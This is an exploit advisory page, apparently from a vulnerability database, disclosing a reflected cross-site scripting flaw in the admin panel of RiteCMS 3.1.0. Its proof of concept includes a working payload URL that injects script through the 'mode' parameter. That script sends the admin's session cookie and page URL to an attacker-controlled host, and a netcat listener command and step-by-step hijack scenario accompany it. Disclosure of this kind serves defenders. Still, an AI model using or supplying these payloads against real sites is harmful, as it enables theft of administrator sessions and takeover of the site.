RiteCMS 3.1.0 Cross Site Scripting

2025.10.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Exploit Title: RiteCMS 3.1.0 - Reflected XSS in Admin Panel ## Date: October 28, 2025 ## Exploit Author: Chokri Hammedi ## Vendor Homepage: https://ritecms.com/ ## Software Link: https://github.com/ritecms/ritecms ## Version: RiteCMS 3.1.0 ## Tested on: windows xp ## Vulnerability Description: Reflected Cross-Site Scripting (XSS) vulnerability in the `mode` parameter of the admin panel allows attackers to steal admin session cookies and compromise the admin account. ## Proof of Concept: ### Alert Proof of Concept: ```http http://ritecms.local/admin.php?mode=');alert('XSS');// ``` ### Cookie Stealing Payload: ```http http://ritecms.local/admin.php?mode=');fetch('http://192.168.1.103:8082/steal ',{method:'POST',body:JSON.stringify({cookie:document.cookie,url:window.location.href})});// ``` ## Attack Scenario: 1. Attacker sets up listener: `nc -lvnp 8082` 2. Attacker sends malicious link to admin 3. Admin clicks link, session cookie is sent to attacker 4. Attacker uses stolen session to gain admin access


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top